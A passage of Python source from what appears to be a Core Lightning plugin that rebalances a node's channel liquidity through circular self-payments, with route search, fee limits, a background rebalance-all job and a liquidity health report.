    channels = plugin.rpc.listchannels(short_channel_id).get('channels')
    destination = next((ch['destination'] for ch in channels if ch['source'] == my_node_id), None)
    if destination is None:
        raise RpcError("rebalance", payload, {'message': 'Cannot find peer for channel: ' + short_channel_id})
    return destination
def find_worst_channel(route):
    """Return the hop of `route` that charges the highest fee, or None.

    Hop i's fee is the drop in forwarded amount between hop i-1 and hop i.
    The first two hops (our own channel and its peer) and the final hop
    are never candidates, so routes shorter than four hops yield None.
    Ties resolve to the earliest candidate hop.
    """
    if len(route) < 4:
        return None

    def fee_of(idx):
        return route[idx - 1]['msatoshi'] - route[idx]['msatoshi']

    worst_idx = max(range(2, len(route) - 1), key=fee_of)
    return route[worst_idx]
def cleanup(plugin, label, payload, rpc_result, error=None):
    """Delete the rebalance invoice and return (or re-raise) the outcome.

    Passes `rpc_result` through on the normal path. A rebalance-level
    RpcError in `error` is unwrapped into a 'normal' result dict; any
    other error is re-raised.
    """
    try:
        plugin.rpc.delinvoice(label, 'unpaid')
    except RpcError as e:
        # race condition: waitsendpay timed out, but invoice get paid
        if 'status is paid' in e.error.get('message', ""):
            return rpc_result
        # any other delinvoice failure is deliberately ignored (best effort)
    if error is not None and isinstance(error, RpcError):
        # unwrap rebalance errors as 'normal' RPC result
        if error.method == "rebalance":
            return {"status": "exception",
                    "message": error.error.get('message', "error not given")}
        raise error
    return rpc_result
# This function calculates the optimal rebalance amount
# based on the selected channels capacity and state.
# It will return a value that brings at least one of the channels to balance.
# It will raise an error, when this isn't possible.
#
# EXAMPLE
#             |------------------- out_total -------------|
# OUT   -v => |-------- out_ours -------||-- out_theirs --| => +v
#
# IN    +v <= |-- in_ours --||---------- in_theirs -------| <= -v
#             |------------------- in_total --------------|
#
# CHEAP SOLUTION: take v_min from 50/50 values
#   O*  vo = out_ours - (out_total/2)
#   I*  vi = (in_total/2) - in_ours
#   return min(vo, vi)
#
# ... and cover edge cases with exceeding in/out capacity or negative values.
def calc_optimal_amount(out_ours, out_total, in_ours, in_total, payload):
    """Return the Millisatoshi amount to move from the outgoing to the
    incoming channel so that at least one of them ends up 50/50 balanced.

    Raises RpcError when any transfer would only worsen the balance.
    """
    out_ours, out_total = int(out_ours), int(out_total)
    in_ours, in_total = int(in_ours), int(in_total)

    in_theirs = in_total - in_ours
    # vo/vi: amount that would bring the out/in channel to 50/50
    vo = int(out_ours - (out_total / 2))
    vi = int((in_total / 2) - in_ours)

    # cases where one option can be eliminated because it exceeds other capacity
    if vo > in_theirs and vi > 0 and vi < out_ours:
        return Millisatoshi(vi)
    if vi > out_ours and vo > 0 and vo < in_theirs:
        return Millisatoshi(vo)

    # cases where one channel is still capable to bring other to balance
    if vo < 0 and vi > 0 and vi < out_ours:
        return Millisatoshi(vi)
    if vi < 0 and vo > 0 and vo < in_theirs:
        return Millisatoshi(vo)

    # when both options are possible take the one with least effort
    if vo > 0 and vo < in_theirs and vi > 0 and vi < out_ours:
        return Millisatoshi(min(vi, vo))

    raise RpcError("rebalance", payload, {'message': 'rebalancing these channels will make things worse'})
class NoRouteException(Exception):
    """Raised when route search has definitively run out of options."""
    pass
def getroute_basic(plugin: Plugin, targetid, fromid, excludes, msatoshi: Millisatoshi):
    """This does not make special assumptions and tries all routes
    it gets. Uses less CPU and does not filter any routes.

    Raises NoRouteException when lightningd reports that no route can
    be found (code 205); other RpcErrors propagate unchanged.
    """
    # NOTE(fix): the docstring used to sit *inside* the try block, where it
    # was just a discarded string expression rather than the function's
    # __doc__; it now documents the function properly.
    try:
        return plugin.rpc.getroute(targetid,
                                   fromid=fromid,
                                   exclude=excludes,
                                   msatoshi=msatoshi,
                                   maxhops=plugin.maxhops,
                                   riskfactor=10, cltv=9)
    except RpcError as e:
        # could not find route -> change params and restart loop
        if e.method == "getroute" and e.error.get('code') == 205:
            raise NoRouteException
        raise e
def getroute_iterative(plugin: Plugin, targetid, fromid, excludes, msatoshi: Millisatoshi):
    """ This searches for 'shorter and bigger pipes' first in order
    to increase likelyhood of success on short timeout.
    Can be useful for manual `rebalance`.

    Search state lives in plugin.maxhopidx / plugin.msatfactoridx and is
    adjusted on every 'no route' failure; the caller retries in a loop.
    """
    try:
        return plugin.rpc.getroute(targetid,
                                   fromid=fromid,
                                   exclude=excludes,
                                   msatoshi=msatoshi * plugin.msatfactoridx,
                                   maxhops=plugin.maxhopidx,
                                   riskfactor=10, cltv=9)
    except RpcError as e:
        # could not find route -> change params and restart loop
        if e.method == "getroute" and e.error.get('code') == 205:
            # reduce _msatfactor to look for smaller channels now
            plugin.msatfactoridx -= 1
            if plugin.msatfactoridx < 1:
                # when we reached neutral msat factor:
                # increase _maxhops and restart with msatfactor
                plugin.maxhopidx += 1
                plugin.msatfactoridx = plugin.msatfactor
            # abort if we reached maxhop limit
            if plugin.maxhops > 0 and plugin.maxhopidx > plugin.maxhops:
                raise NoRouteException
        # re-raise so the caller's retry loop sees the original error
        raise e
def getroute_switch(method_name):
    """Map an option value to a getroute implementation.

    Unknown or missing names fall back to the iterative search.
    """
    if method_name == "basic":
        return getroute_basic
    return getroute_iterative
@plugin.method("rebalance")
def rebalance(plugin, outgoing_scid, incoming_scid, msatoshi: Millisatoshi = None,
              retry_for: int = 60, maxfeepercent: float = 0.5,
              exemptfee: Millisatoshi = Millisatoshi(5000),
              getroute_method=None):
    """Rebalancing channel liquidity with circular payments.
    This tool helps to move some msatoshis between your channels.

    outgoing_scid   -- channel liquidity is taken from
    incoming_scid   -- channel liquidity is moved to
    msatoshi        -- amount to move (default: estimated 50/50 optimum)
    retry_for       -- overall retry budget in seconds
    maxfeepercent   -- relative fee limit
    exemptfee       -- absolute fee that is always allowed
    getroute_method -- 'basic' or 'iterative' route search override
    """
    if msatoshi:
        msatoshi = Millisatoshi(msatoshi)
    retry_for = int(retry_for)
    maxfeepercent = float(maxfeepercent)
    if getroute_method is None:
        getroute = plugin.getroute
    else:
        getroute = getroute_switch(getroute_method)
    exemptfee = Millisatoshi(exemptfee)
    # payload is echoed back inside RpcErrors for debuggability
    payload = {
        "outgoing_scid": outgoing_scid,
        "incoming_scid": incoming_scid,
        "msatoshi": msatoshi,
        "retry_for": retry_for,
        "maxfeepercent": maxfeepercent,
        "exemptfee": exemptfee
    }
    my_node_id = plugin.rpc.getinfo().get('id')
    outgoing_node_id = peer_from_scid(plugin, outgoing_scid, my_node_id, payload)
    incoming_node_id = peer_from_scid(plugin, incoming_scid, my_node_id, payload)
    # validate both channels are usable (CHANNELD_NORMAL, peer connected)
    get_channel(plugin, payload, outgoing_node_id, outgoing_scid, True)
    get_channel(plugin, payload, incoming_node_id, incoming_scid, True)
    out_ours, out_total = amounts_from_scid(plugin, outgoing_scid)
    in_ours, in_total = amounts_from_scid(plugin, incoming_scid)

    # If amount was not given, calculate a suitable 50/50 rebalance amount
    if msatoshi is None:
        msatoshi = calc_optimal_amount(out_ours, out_total, in_ours, in_total, payload)
        plugin.log("Estimating optimal amount %s" % msatoshi)

    # Check requested amounts are selected channels
    if msatoshi > out_ours or msatoshi > in_total - in_ours:
        raise RpcError("rebalance", payload, {'message': 'Channel capacities too low'})

    plugin.log(f"starting rebalance out_scid:{outgoing_scid} in_scid:{incoming_scid} amount:{msatoshi}", 'debug')

    # fixed first and last hops of the circular route (self -> ... -> self)
    route_out = {'id': outgoing_node_id, 'channel': outgoing_scid, 'direction': int(not my_node_id < outgoing_node_id)}
    route_in = {'id': my_node_id, 'channel': incoming_scid, 'direction': int(not incoming_node_id < my_node_id)}
    start_ts = int(time.time())
    label = "Rebalance-" + str(uuid.uuid4())
    description = "%s to %s" % (outgoing_scid, incoming_scid)
    invoice = plugin.rpc.invoice(msatoshi, label, description, retry_for + 60)
    payment_hash = invoice['payment_hash']
    # The requirement for payment_secret coincided with its addition to the invoice output.
    payment_secret = invoice.get('payment_secret')

    rpc_result = None
    excludes = [my_node_id]  # excude all own channels to prevent shortcuts
    nodes = {}  # here we store erring node counts
    plugin.maxhopidx = 1  # start with short routes and increase
    plugin.msatfactoridx = plugin.msatfactor  # start with high capacity factor
    # and decrease to reduce WIRE_TEMPORARY failures because of imbalances

    # 'disable' maxhops filter if set to <= 0
    # I know this is ugly, but we don't ruin the rest of the code this way
    if plugin.maxhops <= 0:
        plugin.maxhopidx = 20

    # trace stats
    count = 0
    count_sendpay = 0
    time_getroute = 0
    time_sendpay = 0

    try:
        # retry until the time budget is spent or a stop was requested
        while int(time.time()) - start_ts < retry_for and not plugin.rebalance_stop:
            count += 1
            try:
                time_start = time.time()
                r = getroute(plugin,
                             targetid=incoming_node_id,
                             fromid=outgoing_node_id,
                             excludes=excludes,
                             msatoshi=msatoshi)
                time_getroute += time.time() - time_start
            except NoRouteException:
                # no more chance for a successful getroute
                rpc_result = {'status': 'error', 'message': 'No suitable routes found'}
                return cleanup(plugin, label, payload, rpc_result)
            except RpcError as e:
                # getroute can be successful next time with different parameters
                if e.method == "getroute" and e.error.get('code') == 205:
                    continue
                else:
                    raise e

            # complete the circle: our out channel + found path + our in channel
            route_mid = r['route']
            route = [route_out] + route_mid + [route_in]
            setup_routing_fees(plugin, route, msatoshi)
            fees = route[0]['amount_msat'] - msatoshi

            # check fee and exclude worst channel the next time
            # NOTE: the int(msat) casts are just a workaround for outdated pylightning versions
            if fees > exemptfee and int(fees) > int(msatoshi) * maxfeepercent / 100:
                worst_channel = find_worst_channel(route)
                if worst_channel is None:
                    raise RpcError("rebalance", payload, {'message': 'Insufficient fee'})
                excludes.append(worst_channel['channel'] + '/' + str(worst_channel['direction']))
                continue

            rpc_result = {"sent": msatoshi + fees, "received": msatoshi, "fee": fees, "hops": len(route),
                          "outgoing_scid": outgoing_scid, "incoming_scid": incoming_scid, "status": "complete",
                          "message": f"{msatoshi + fees} sent over {len(route)} hops to rebalance {msatoshi}"}
            plugin.log("Sending %s over %d hops to rebalance %s" % (msatoshi + fees, len(route), msatoshi), 'debug')
            for r in route:
                plugin.log(" - %s %14s %s" % (r['id'], r['channel'], r['amount_msat']), 'debug')

            time_start = time.time()
            count_sendpay += 1
            try:
                plugin.rpc.sendpay(route, payment_hash, payment_secret=payment_secret)
                running_for = int(time.time()) - start_ts
                result = plugin.rpc.waitsendpay(payment_hash, max(retry_for - running_for, 0))
                time_sendpay += time.time() - time_start
                if result.get('status') == "complete":
                    rpc_result["stats"] = f"running_for:{int(time.time()) - start_ts} count_getroute:{count} time_getroute:{time_getroute} time_getroute_avg:{time_getroute / count} count_sendpay:{count_sendpay} time_sendpay:{time_sendpay} time_sendpay_avg:{time_sendpay / count_sendpay}"
                    return cleanup(plugin, label, payload, rpc_result)
            except RpcError as e:
                time_sendpay += time.time() - time_start
                plugin.log(f"maxhops:{plugin.maxhopidx} msatfactor:{plugin.msatfactoridx} running_for:{int(time.time()) - start_ts} count_getroute:{count} time_getroute:{time_getroute} time_getroute_avg:{time_getroute / count} count_sendpay:{count_sendpay} time_sendpay:{time_sendpay} time_sendpay_avg:{time_sendpay / count_sendpay}", 'debug')
                # plugin.log(f"RpcError: {str(e)}", 'debug')
                # check if we ran into the `rpc.waitsendpay` timeout
                if e.method == "waitsendpay" and e.error.get('code') == 200:
                    raise RpcError("rebalance", payload, {'message': 'Timeout reached'})
                # check if we have problems with our own channels
                erring_node = e.error.get('data', {}).get('erring_node')
                erring_channel = e.error.get('data', {}).get('erring_channel')
                erring_direction = e.error.get('data', {}).get('erring_direction')
                if erring_channel == incoming_scid:
                    raise RpcError("rebalance", payload, {'message': 'Error with incoming channel'})
                if erring_channel == outgoing_scid:
                    raise RpcError("rebalance", payload, {'message': 'Error with outgoing channel'})
                # exclude other erroring channels
                if erring_channel is not None and erring_direction is not None:
                    excludes.append(erring_channel + '/' + str(erring_direction))
                # count and exclude nodes that produce a lot of errors
                if erring_node and plugin.erringnodes > 0:
                    if nodes.get(erring_node) is None:
                        nodes[erring_node] = 0
                    nodes[erring_node] += 1
                    if nodes[erring_node] >= plugin.erringnodes:
                        excludes.append(erring_node)
    except Exception as e:
        return cleanup(plugin, label, payload, rpc_result, e)

    rpc_result = {'status': 'error', 'message': 'Timeout reached'}
    return cleanup(plugin, label, payload, rpc_result)
def a_minus_b(a: Millisatoshi, b: Millisatoshi):
    """Subtract `b` from `a`, clamped at zero (Millisatoshi cannot be
    negative)."""
    if a > b:
        return a - b
    return Millisatoshi(0)
# The following helpers classify how much liquidity can/should/must move
# through one channel, given a liquidity_info() dict. Every result is
# clamped at zero msat by a_minus_b().

def must_send(liquidity):
    # liquidity is too high, must send some sats
    return a_minus_b(liquidity["min"], liquidity["their"])


def should_send(liquidity):
    # liquidity is a bit high, would be good to send some sats
    return a_minus_b(liquidity["ideal"]["their"], liquidity["their"])


def could_send(liquidity):
    # liquidity maybe a bit low, but can send some more sats, if needed
    return a_minus_b(liquidity["our"], liquidity["min"])


def must_receive(liquidity):
    # liquidity is too low, must receive some sats
    return a_minus_b(liquidity["min"], liquidity["our"])


def should_receive(liquidity):
    # liquidity is a bit low, would be good to receive some sats
    return a_minus_b(liquidity["ideal"]["our"], liquidity["our"])


def could_receive(liquidity):
    # liquidity maybe a bit high, but can receive some more sats, if needed
    return a_minus_b(liquidity["their"], liquidity["min"])
def get_open_channels(plugin: Plugin):
    """Return all of our public channels that are in CHANNELD_NORMAL state."""
    peers = plugin.rpc.listpeers()["peers"]
    return [ch
            for peer in peers
            for ch in peer["channels"]
            if ch["state"] == "CHANNELD_NORMAL" and not ch["private"]]
def check_liquidity_threshold(channels: list, threshold: Millisatoshi):
    """Check whether rebalances towards `threshold` per channel are feasible
    with the liquidity we and our peers currently hold overall."""
    ours = sum(ch["to_us_msat"] for ch in channels)
    total = sum(ch["total_msat"] for ch in channels)
    theirs = total - ours
    required = Millisatoshi(0)
    for ch in channels:
        # each channel needs at most half its capacity on either side
        required += min(threshold, ch["total_msat"] / 2)
    return required < ours and required < theirs
def get_enough_liquidity_threshold(channels: list):
    """Find the 'enough liquidity' threshold for automatic rebalancing.

    Binary-searches, to 1sat precision, the highest per-channel liquidity
    threshold that check_liquidity_threshold() still accepts, within
    [0, half of the biggest channel], and returns half of that value.
    """
    low = Millisatoshi(0)
    biggest_channel = max(channels, key=lambda ch: ch["total_msat"])
    high = biggest_channel["total_msat"] / 2
    while True:
        mid = (low + high) / 2
        if high - low < Millisatoshi("1sat"):
            break
        if check_liquidity_threshold(channels, mid):
            low = mid
        else:
            high = mid
    # half of the found feasible threshold is used as the final value
    return mid / 2
def get_ideal_ratio(channels: list, enough_liquidity: Millisatoshi):
    # ideal liquidity ratio for big channels:
    # small channels should have a 50/50 liquidity ratio to be usable
    # and big channels can store the remaining liquidity above the threshold
    assert len(channels) > 0
    our = sum(ch["to_us_msat"] for ch in channels)
    total = sum(ch["total_msat"] for ch in channels)
    chs = list(channels)  # get a copy!
    # repeatedly peel off the smallest channel, reserving it a balanced
    # share of liquidity, until the remaining (big) channels can hold the
    # enough_liquidity threshold on both sides at the current ratio
    while len(chs) > 0:
        ratio = int(our) / int(total)
        smallest_channel = min(chs, key=lambda ch: ch["total_msat"])
        if smallest_channel["total_msat"] * min(ratio, 1 - ratio) > enough_liquidity:
            break
        # give the smallest channel its share, clamped so it keeps at
        # least min_liquidity on each side
        min_liquidity = min(smallest_channel["total_msat"] / 2, enough_liquidity)
        diff = smallest_channel["total_msat"] * ratio
        diff = max(diff, min_liquidity)
        diff = min(diff, smallest_channel["total_msat"] - min_liquidity)
        our -= diff
        total -= smallest_channel["total_msat"]
        chs.remove(smallest_channel)
    assert 0 <= ratio and ratio <= 1
    return ratio
def feeadjust_would_be_nice(plugin: Plugin):
    """Run the feeadjuster plugin's `feeadjust` command once, if that
    plugin is loaded; otherwise just log a hint."""
    available = [c for c in plugin.rpc.help().get("help")
                 if c["command"].split()[0] == "feeadjust"]
    if len(available) != 1:
        plugin.log("The feeadjuster plugin would be useful here")
        return
    msg = plugin.rpc.feeadjust()
    plugin.log(f"Feeadjust succeeded: {msg}")
def get_max_amount(i: int, plugin: Plugin):
    """Amount cap for rebalance attempt `i`: a quarter of the
    enough-liquidity threshold, shrinking 4x per retry, but never below
    plugin.min_amount."""
    shrinking_cap = plugin.enough_liquidity / (4**(i + 1))
    return max(plugin.min_amount, shrinking_cap)
def get_max_fee(plugin: Plugin, msat: Millisatoshi):
    """Maximum fee to pay for rebalancing `msat`: our own fee schedule
    applied to the amount, scaled by the configured feeratio."""
    # TODO: sanity check
    our_fee = plugin.fee_base + msat * plugin.fee_ppm / 10**6
    return our_fee * plugin.feeratio
def get_chan(plugin: Plugin, scid: str):
    """Return our channel entry matching `scid`, or None when not found."""
    # We might have multiple channel entries per peer! Eg if one was just
    # closed and reopened, so every entry has to be inspected.
    for peer in plugin.rpc.listpeers()["peers"]:
        for chan in peer["channels"]:
            if chan.get("short_channel_id") == scid:
                return chan
def liquidity_info(channel, enough_liquidity: Millisatoshi, ideal_ratio: float):
    """Describe the liquidity situation of `channel`.

    Returns a dict with our/their current liquidity, min/max bounds
    derived from the enough-liquidity threshold, and the ideal values
    implied by `ideal_ratio`, clamped to those bounds.
    """
    total = channel["total_msat"]
    ours = channel["to_us_msat"]
    half = total / 2
    low = min(enough_liquidity, half)
    high = max(a_minus_b(total, enough_liquidity), half)

    def clamp(value):
        return min(max(value, low), high)

    return {
        "our": ours,
        "their": total - ours,
        "min": low,
        "max": high,
        "ideal": {
            "our": clamp(total * ideal_ratio),
            "their": clamp(total * (1 - ideal_ratio)),
        },
    }
def wait_for(success, timeout: int = 60):
    """Poll `success()` with exponential backoff (capped at 5s) until it
    returns truthy or `timeout` seconds have elapsed.

    Returns True on success, False on timeout. Taken and modified from
    pyln-testing/pyln/testing/utils.py.
    """
    deadline = time.time() + timeout
    delay = 0.25
    while not success():
        remaining = deadline - time.time()
        if remaining <= 0:
            return False
        time.sleep(min(delay, remaining))
        delay = min(delay * 2, 5)
    return True
def wait_for_htlcs(plugin, failed_channels: list, scids: list = None):
    """Wait until in-flight HTLCs on the given channels have settled.

    Channels already listed in `failed_channels` are skipped; channels
    that time out waiting are appended to it. Returns False when any
    channel was or became failed. Taken and modified from
    pyln-testing/pyln/testing/utils.py.
    """
    result = True
    peers = plugin.rpc.listpeers()['peers']
    for p, peer in enumerate(peers):
        if 'channels' in peer:
            for c, channel in enumerate(peer['channels']):
                if scids is not None and channel.get('short_channel_id') not in scids:
                    continue
                if channel.get('short_channel_id') in failed_channels:
                    result = False
                    continue
                if 'htlcs' in channel:
                    # re-query listpeers on every poll; p/c index into the
                    # fresh reply to read the current htlc list
                    if not wait_for(lambda: len(plugin.rpc.listpeers()['peers'][p]['channels'][c]['htlcs']) == 0):
                        failed_channels.append(channel.get('short_channel_id'))
                        plugin.log(f"Timeout while waiting for htlc settlement in channel {channel.get('short_channel_id')}")
                        result = False
    return result
def maybe_rebalance_pairs(plugin: Plugin, ch1, ch2, failed_channels: list):
    """Try to move liquidity from channel `ch1` into channel `ch2`.

    Repeats with refreshed channel data until the computed amount drops
    below plugin.min_amount or a stop is requested; failures shrink the
    attempted amount before giving up. Returns a dict with "success" and
    the total "fee_spent".
    """
    scid1 = ch1["short_channel_id"]
    scid2 = ch2["short_channel_id"]
    result = {"success": False, "fee_spent": Millisatoshi(0)}
    # skip pairs that already failed earlier in this run
    if scid1 + ":" + scid2 in failed_channels:
        return result
    # check if HTLCs are settled
    if not wait_for_htlcs(plugin, failed_channels, [scid1, scid2]):
        return result
    i = 0
    while not plugin.rebalance_stop:
        liquidity1 = liquidity_info(ch1, plugin.enough_liquidity, plugin.ideal_ratio)
        liquidity2 = liquidity_info(ch2, plugin.enough_liquidity, plugin.ideal_ratio)

        # pick the strongest justified amount: must->could, should->should,
        # could->must pairings between sender and receiver
        amount1 = min(must_send(liquidity1), could_receive(liquidity2))
        amount2 = min(should_send(liquidity1), should_receive(liquidity2))
        amount3 = min(could_send(liquidity1), must_receive(liquidity2))
        amount = max(amount1, amount2, amount3)
        if amount < plugin.min_amount:
            return result
        amount = min(amount, get_max_amount(i, plugin))
        maxfee = get_max_fee(plugin, amount)
        plugin.log(f"Try to rebalance: {scid1} -> {scid2}; amount={amount}; maxfee={maxfee}")
        start_ts = time.time()
        try:
            res = rebalance(plugin, outgoing_scid=scid1, incoming_scid=scid2,
                            msatoshi=amount, retry_for=1200, maxfeepercent=0,
                            exemptfee=maxfee)
            if not res.get('status') == 'complete':
                raise Exception  # fall into exception handler below
        except Exception:
            failed_channels.append(scid1 + ":" + scid2)
            # rebalance failed, let's try with a smaller amount
            while (get_max_amount(i, plugin) >= amount and
                   get_max_amount(i, plugin) != get_max_amount(i + 1, plugin)):
                i += 1
            if amount > get_max_amount(i, plugin):
                continue
            return result
        result["success"] = True
        result["fee_spent"] += res["fee"]
        htlc_start_ts = time.time()
        # wait for settlement
        htlc_success = wait_for_htlcs(plugin, failed_channels, [scid1, scid2])
        current_ts = time.time()
        res["elapsed_time"] = str(timedelta(seconds=current_ts - start_ts))[:-3]
        res["htlc_time"] = str(timedelta(seconds=current_ts - htlc_start_ts))[:-3]
        plugin.log(f"Rebalance succeeded: {res}")
        if not htlc_success:
            return result
        # refresh channel data before the next iteration
        ch1 = get_chan(plugin, scid1)
        assert ch1 is not None
        ch2 = get_chan(plugin, scid2)
        assert ch2 is not None
    return result
def maybe_rebalance_once(plugin: Plugin, failed_channels: list):
    """Try rebalancing between every ordered pair of open channels,
    stopping at the first success or when a stop was requested."""
    channels = get_open_channels(plugin)
    for out_ch in channels:
        for in_ch in channels:
            if out_ch == in_ch:
                continue
            outcome = maybe_rebalance_pairs(plugin, out_ch, in_ch, failed_channels)
            if outcome["success"] or plugin.rebalance_stop:
                return outcome
    return {"success": False, "fee_spent": Millisatoshi(0)}
def feeadjuster_toggle(plugin: Plugin, new_value: bool):
    """Set the feeadjuster plugin's forward_event subscription to
    `new_value`, returning its previous state (True when the feeadjuster
    plugin is not loaded)."""
    available = [c for c in plugin.rpc.help().get("help")
                 if c["command"].split()[0] == "feeadjuster-toggle"]
    if len(available) != 1:
        return True
    msg = plugin.rpc.feeadjuster_toggle(new_value)
    return msg["forward_event_subscription"]["previous"]
def rebalanceall_thread(plugin: Plugin):
    """Background worker for rebalanceall.

    Holds plugin.mutex for the whole run (rebalancestop blocks on it),
    disables the feeadjuster while working, and keeps attempting single
    rebalances until none succeeds or a stop is requested.
    """
    if not plugin.mutex.acquire(blocking=False):
        # another run is already in progress
        return
    try:
        start_ts = time.time()
        feeadjuster_state = feeadjuster_toggle(plugin, False)
        channels = get_open_channels(plugin)
        plugin.enough_liquidity = get_enough_liquidity_threshold(channels)
        plugin.ideal_ratio = get_ideal_ratio(channels, plugin.enough_liquidity)
        plugin.log(f"Automatic rebalance is running with enough liquidity threshold: {plugin.enough_liquidity}, "
                   f"ideal liquidity ratio: {plugin.ideal_ratio * 100:.2f}%, "
                   f"min rebalancable amount: {plugin.min_amount}, "
                   f"feeratio: {plugin.feeratio}")
        failed_channels = []
        success = 0
        fee_spent = Millisatoshi(0)
        while not plugin.rebalance_stop:
            result = maybe_rebalance_once(plugin, failed_channels)
            if not result["success"]:
                break
            success += 1
            fee_spent += result["fee_spent"]
        feeadjust_would_be_nice(plugin)
        # restore the feeadjuster to its previous state
        feeadjuster_toggle(plugin, feeadjuster_state)
        elapsed_time = timedelta(seconds=time.time() - start_ts)
        plugin.rebalanceall_msg = f"Automatic rebalance finished: {success} successful rebalance, {fee_spent} fee spent, it took {str(elapsed_time)[:-3]}"
        plugin.log(plugin.rebalanceall_msg)
    finally:
        plugin.mutex.release()
@plugin.method("rebalanceall")
def rebalanceall(plugin: Plugin, min_amount: Millisatoshi = Millisatoshi("50000sat"), feeratio: float = 0.5):
    """Rebalance all unbalanced channels if possible for a very low fee.
    Default minimum rebalancable amount is 50000sat. Default feeratio = 0.5, half of our node's default fee.
    To be economical, it tries to fix the liquidity cheaper than it can be ruined by transaction forwards.
    It may run for a long time (hours) in the background, but can be stopped with the rebalancestop method.
    """
    # some early checks before we start the async thread
    if plugin.mutex.locked():
        return {"message": "Rebalance is already running, this may take a while. To stop it use the cli method 'rebalancestop'."}
    channels = get_open_channels(plugin)
    if len(channels) <= 1:
        return {"message": "Error: Not enough open channels to rebalance anything"}
    our = sum(ch["to_us_msat"] for ch in channels)
    total = sum(ch["total_msat"] for ch in channels)
    min_amount = Millisatoshi(min_amount)
    if total - our < min_amount or our < min_amount:
        return {"message": "Error: Not enough liquidity to rebalance anything"}

    # param parsing ensure correct type
    plugin.feeratio = float(feeratio)
    plugin.min_amount = min_amount

    # run the job in the background; outcome is reported via the log and
    # plugin.rebalanceall_msg
    t = Thread(target=rebalanceall_thread, args=(plugin, ))
    t.start()
    return {"message": f"Rebalance started with min rebalancable amount: {plugin.min_amount}, feeratio: {plugin.feeratio}"}
@plugin.method("rebalancestop")
def rebalancestop(plugin: Plugin):
    """It stops the ongoing rebalanceall.
    """
    if not plugin.mutex.locked():
        # nothing running; report the outcome of the last run, if any
        if plugin.rebalanceall_msg is None:
            return {"message": "No rebalance is running, nothing to stop."}
        return {"message": f"No rebalance is running, nothing to stop. "
                f"Last 'rebalanceall' gave: {plugin.rebalanceall_msg}"}
    # signal the worker to stop, then block on the mutex until
    # rebalanceall_thread releases it
    plugin.rebalance_stop = True
    plugin.mutex.acquire(blocking=True)
    plugin.rebalance_stop = False
    plugin.mutex.release()
    return {"message": plugin.rebalanceall_msg}
def health_score(liquidity):
    """Score a channel's liquidity health in the range 0..100.

    The base score (50..100) measures distance from the ideal liquidity
    split; it is scaled towards 0 when either side sits below the
    minimum liquidity threshold.
    """
    ideal_our = int(liquidity["ideal"]["our"])
    ideal_their = int(liquidity["ideal"]["their"])
    minimum = int(liquidity["min"])
    if 0 in (ideal_our, ideal_their, minimum):
        # degenerate targets: avoid dividing by zero, call it unhealthy
        return 0
    our = int(liquidity["our"])
    their = int(liquidity["their"])
    # distance from ideal liquidity (between 50 and 100)
    base = min(our / ideal_our, their / ideal_their) * 50 + 50
    # distance from minimal liquidity as a coefficient (between 0 and 1)
    scale = min(our / minimum, their / minimum, 1)
    return base * scale
def get_avg_forward_fees(plugin: Plugin, intervals):
    """Average forwarding fee, in ppm, per look-back window.

    `intervals` lists windows in days (e.g. [1, 7, 30]); the result
    holds, for each window, the fee ppm averaged over all forwards
    settled within it, or 0 when there were none.
    """
    now = time.time()
    max_interval = max(intervals)
    total = [0] * len(intervals)
    fees = [0] * len(intervals)
    res = [0] * len(intervals)
    # only settled forwards inside the largest window are of interest
    all_forwards = list(filter(lambda fwd: fwd.get("status") == "settled"
                               and fwd.get("resolved_time", 0)
                               + max_interval * 60 * 60 * 24 > now,
                               plugin.rpc.listforwards()["forwards"]))
    # build intermediate result per interval
    for fwd in all_forwards:
        for idx, i in enumerate(intervals):
            if now > fwd["resolved_time"] + i * 60 * 60 * 24:
                continue
            total[idx] += fwd["out_msat"]
            fees[idx] += fwd["fee_msat"]
    # return average in ppm; guard against windows with no forwards,
    # which previously raised ZeroDivisionError
    for idx in range(len(res)):
        if total[idx]:
            res[idx] = fees[idx] / total[idx] * 10**6
    return res
@plugin.method("rebalancereport")
def rebalancereport(plugin: Plugin):
    """Show information about rebalance
    """
    res = {}
    res["rebalanceall_is_running"] = plugin.mutex.locked()
    res["getroute_method"] = plugin.getroute.__name__
    res["maxhops_threshold"] = plugin.maxhops
    res["msatfactor"] = plugin.msatfactor
    res["erringnodes_threshold"] = plugin.erringnodes
    channels = get_open_channels(plugin)
    health_percent = 0.0
    if len(channels) > 1:
        enough_liquidity = get_enough_liquidity_threshold(channels)
        ideal_ratio = get_ideal_ratio(channels, enough_liquidity)
        res["enough_liquidity_threshold"] = enough_liquidity
        res["ideal_liquidity_ratio"] = f"{ideal_ratio * 100:.2f}%"
        # capacity-weighted average of per-channel health scores
        for ch in channels:
            liquidity = liquidity_info(ch, enough_liquidity, ideal_ratio)
            health_percent += health_score(liquidity) * int(ch["total_msat"])
        health_percent /= int(sum(ch["total_msat"] for ch in channels))
    else:
        res["enough_liquidity_threshold"] = Millisatoshi(0)
        res["ideal_liquidity_ratio"] = "0%"
    res["liquidity_health"] = f"{health_percent:.2f}%"
    # aggregate stats over all paid rebalance invoices
    invoices = plugin.rpc.listinvoices()['invoices']
    rebalances = [i for i in invoices if i.get('status') == 'paid' and i.get('label').startswith("Rebalance")]
    total_fee = Millisatoshi(0)
    total_amount = Millisatoshi(0)
    res["total_successful_rebalances"] = len(rebalances)
    for r in rebalances:
        try:
            pay = plugin.rpc.listpays(r["bolt11"])["pays"][0]
            total_amount += pay["amount_msat"]
            total_fee += pay["amount_sent_msat"] - pay["amount_msat"]
        except Exception:
            # payment lookup failed: don't count this invoice
            res["total_successful_rebalances"] -= 1
    res["total_rebalanced_amount"] = total_amount
    res["total_rebalance_fee"] = total_fee
    if total_amount > Millisatoshi(0):
        res["average_rebalance_fee_ppm"] = round(total_fee / total_amount * 10**6, 2)
    else:
        res["average_rebalance_fee_ppm"] = 0
    avg_forward_fees = get_avg_forward_fees(plugin, [1, 7, 30])
    res['average_forward_fee_ppm_1d'] = avg_forward_fees[0]
    res['average_forward_fee_ppm_7d'] = avg_forward_fees[1]
    res['average_forward_fee_ppm_30d'] = avg_forward_fees[2]
    return res
@plugin.init()
def init(options, configuration, plugin):
    """Read node config and plugin options into plugin-level state at startup."""
    config = plugin.rpc.listconfigs()
    plugin.cltv_final = config.get("cltv-final")
    plugin.fee_base = Millisatoshi(config.get("fee-base"))
    plugin.fee_ppm = config.get("fee-per-satoshi")
    # Serializes rebalanceall runs; rebalancereport reads .locked() for status.
    plugin.mutex = Lock()
    plugin.maxhops = int(options.get("rebalance-maxhops"))
    plugin.msatfactor = float(options.get("rebalance-msatfactor"))
    plugin.erringnodes = int(options.get("rebalance-erringnodes"))
